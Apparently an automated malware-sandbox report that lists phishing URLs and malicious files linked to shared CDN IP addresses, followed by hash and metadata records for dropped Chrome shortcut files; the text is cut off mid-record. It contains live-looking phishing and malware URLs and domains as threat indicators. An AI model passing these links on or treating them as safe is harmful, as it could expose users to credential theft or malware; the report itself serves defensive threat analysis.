                                  https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                    NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                      https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                        https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                          vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                            https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                              https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                104.18.95.41https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                  https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                    https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                      Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                        https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                          https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                            NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                  vRecord__0064secs__warriorsheart.com.htmlGet hashmaliciousUnknownBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    challenges.cloudflare.comhttps://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41
                                                                    https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.18.94.41
                                                                    https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    • 104.18.95.41
                                                                    Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                    • 104.18.94.41
                                                                    Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                    • 104.18.94.41
                                                                    https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.18.95.41
                                                                    https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.18.95.41
                                                                    NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.18.94.41
                                                                    https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41
                                                                    https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41
                                                                    cdnjs.cloudflare.comhttps://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                                                    • 104.17.25.14
                                                                    https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    • 104.17.25.14
                                                                    Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                    • 104.17.24.14
                                                                    Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.24.14
                                                                    Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.24.14
                                                                    https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.24.14
                                                                    NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    code.jquery.comTimesheet ACH-Tbconsulting.November 16, 2024.htmlGet hashmaliciousUnknownBrowse
                                                                    • 151.101.130.137
                                                                    https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                    • 151.101.2.137
                                                                    https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.130.137
                                                                    https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    • 151.101.130.137
                                                                    Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                    • 151.101.2.137
                                                                    Eallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.194.137
                                                                    Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                    • 151.101.66.137
                                                                    https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.2.137
                                                                    https://e.trustifi.com/#/fff2a1/305619/6dc30e/bb62bb/581844/11c063/a3c1ce/c0ba4d/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/838c7e/cd63d6/82c9fe/baf706/264690/9188a6/a54400/a45112/68deb9/a1d612/148c70/62dcf5/9cb4f7/9713c0/de2350/884a31/c8623a/2f5546/ab6255/63291e/390e78/6b371c/add804/d4bbed/01f0b4/6023ca/9b7c0b/b0881b/bd8fbb/380790/942e2d/c30675/2c79c4/594b5b/fa5dac/c17e29/ec9861/3d4f90/8d1dd9/15a5f1/e3d291/035383/58ff7f/dcf654/c36a6d/ac2219/0a7478/f49f04/50db6b/1c0640/509cd9/d5eb23/7e01e4/b5bcef/2cfb1e/1cd263/f68c45/7325e0/8e5d9b/dacf2c/074706/a0f040/11bf65/f8b4f7/b49b4f/da74f6/285aa9/b249dd/d9b9c7/1a738e/07e7fa/7ea43f/a69f97/422641/436e51/504e86Get hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.130.137
                                                                    NieuwBetalingsbevestigingvoor vanas.eu.htmGet hashmaliciousHTMLPhisherBrowse
                                                                    • 151.101.194.137
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUSTimesheet ACH-Tbconsulting.November 16, 2024.htmlGet hashmaliciousUnknownBrowse
                                                                    • 172.66.47.118
                                                                    https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                                                    • 104.17.25.14
                                                                    https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    • 104.17.24.14
                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                    • 172.67.177.88
                                                                    mirabon.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                    • 188.114.97.6
                                                                    Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                    • 172.67.180.133
                                                                    Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                    • 172.67.180.133
                                                                    Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                    • 172.67.134.110
                                                                    CLOUDFLARENETUSTimesheet ACH-Tbconsulting.November 16, 2024.htmlGet hashmaliciousUnknownBrowse
                                                                    • 172.66.47.118
                                                                    https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                                                    • 104.17.25.14
                                                                    https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    • 104.17.24.14
                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                    • 172.67.177.88
                                                                    mirabon.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                    • 188.114.97.6
                                                                    Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                    • 172.67.180.133
                                                                    Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                    • 172.67.180.133
                                                                    Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                    • 172.67.134.110
                                                                    CLOUDFLARENETUSTimesheet ACH-Tbconsulting.November 16, 2024.htmlGet hashmaliciousUnknownBrowse
                                                                    • 172.66.47.118
                                                                    https://whtt.termlicari.ru/HnkNbg/Get hashmaliciousUnknownBrowse
                                                                    • 104.17.25.14
                                                                    https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    https://gmail.net-login.com/Xb1Rnb3pKRC9CUEdpbldIVTREbHhIK1Vza1NvaWlrblBIbkN4aUdCZUt0Y2NlSGJiWmZ2d0M1dTB5dEpRbnRoVDdBVkFTcEJqWGowNVZycWJNWHlIUHlLOG1qS0FvemVPSXpFRFhGcUhmaVU1ekQwMklrVmM0QjVpNmhLaDdoY1I4UlhMcFo1TTJaSFhtaWpiWWFqWGZ5WEg4TnBiOUl4MDI1RFMyWStQRFoyNFo5UFZNUUpmWXBtaUg0Y0FjUG1jejdSVnFVOXJQL2VzdmNLM1lEaWtmRkZnZEk2Vi0tVHFIeU0vOWxTN01YVEtXbS0tTTh5Skh1eEtsc0xTT0J5Rzg2Q2ZJQT09?cid=2330416057%3EOpenGet hashmaliciousKnowBe4Browse
                                                                    • 104.17.25.14
                                                                    https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                    • 104.17.24.14
                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                    • 172.67.177.88
                                                                    mirabon.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                    • 188.114.97.6
                                                                    Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                    • 172.67.180.133
                                                                    Doc_14-58-28.jsGet hashmaliciousUnknownBrowse
                                                                    • 172.67.180.133
                                                                    Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                    • 172.67.134.110
                                                                    No context
                                                                    No context
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:51:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2677
                                                                    Entropy (8bit):3.9838430591444474
                                                                    Encrypted:false
                                                                    SSDEEP:48:8nduTK+NHqidAKZdA19ehwiZUklqeh2y+3:8ovGZy
                                                                    MD5:B9CDC530607FF7A58DF054D7560B8DFD
                                                                    SHA1:C8FE0A1B52FA22AF9EAEA3A3F1E932ABED0F8610
                                                                    SHA-256:CFC0CAB6CC2DF5CFE90F171719178B4B8B84627128AC86B8F1BA558D9F1DE051
                                                                    SHA-512:A48E4CA15F0C9401AF71C4ACCB53E8F5A609C4F192AF085CC7D77B3678187AFFE0143A7D3130EB03990CB79CCB7B70365943826B86862D396FBD49CBE319263C
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ...$+.,.....Z./6R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y].....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:51:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2679
                                                                    Entropy (8bit):3.9970805218571797
                                                                    Encrypted:false
                                                                    SSDEEP:48:8AnduTK+NHqidAKZdA1weh/iZUkAQkqehJy+2:8VvE9Q0y
                                                                    MD5:4780EED07E4B8FE2E395C6FD77F9E860
                                                                    SHA1:021C95BF04994BFA611D2253E16F1C3542509C4A
                                                                    SHA-256:1325196D3553D95D6EC0D5FB0183F0079512472BD0DFC5A19169E34D2E324C8A
                                                                    SHA-512:4850ECC81AB5CA6B5446A8879667CB316212752EDBDC71E258D4FBCBF190219670F99554FF45E454A22F8E4B520A57611286CCA1DEF456FD3EA876C8C60AF8B6
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ...$+.,.....2./6R..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y].....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yb............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2693
                                                                    Entropy (8bit):4.011358605600914
                                                                    Encrypted:false
                                                                    SSDEEP:48:8xnduTK+sHqidAKZdA14tseh7sFiZUkmgqeh7sny+BX:8xov3nVy
                                                                    MD5:2564249AA708B037C1A6465595887281
                                                                    SHA1:CBA0062E4DCD4B6764B01A2FF4288B7E770BB88F
                                                                    SHA-256:FD6D9937943FE1984C171674B497DE462BFE6CFF1306308AE29BF9BF66FC1D27
                                                                    SHA-512:04E01082B60ED57C31D78A9999DA47FF279607C42B8A0B0459C00829740F1885CD835F16818F4DA82B3EC0FB5E372F4707783B3613E1A863D5AA86ECA772D3E8
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y].....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y].....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y].....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y]............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 15:51:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2681
                                                                    Entropy (8bit):3.9970134313519425
                                                                    Encrypted:false
                                                                    SSDEEP:48:8HDduTK+NHqidAKZdA1vehDiZUkwqeh9y+R:8HUvPvy
                                                                    MD5:78CF7D15ACC5CE2545706A5AB292E919
                                                                    SHA1:30911780641DE3A03DD69E71B9EC6CDE5920E2D8
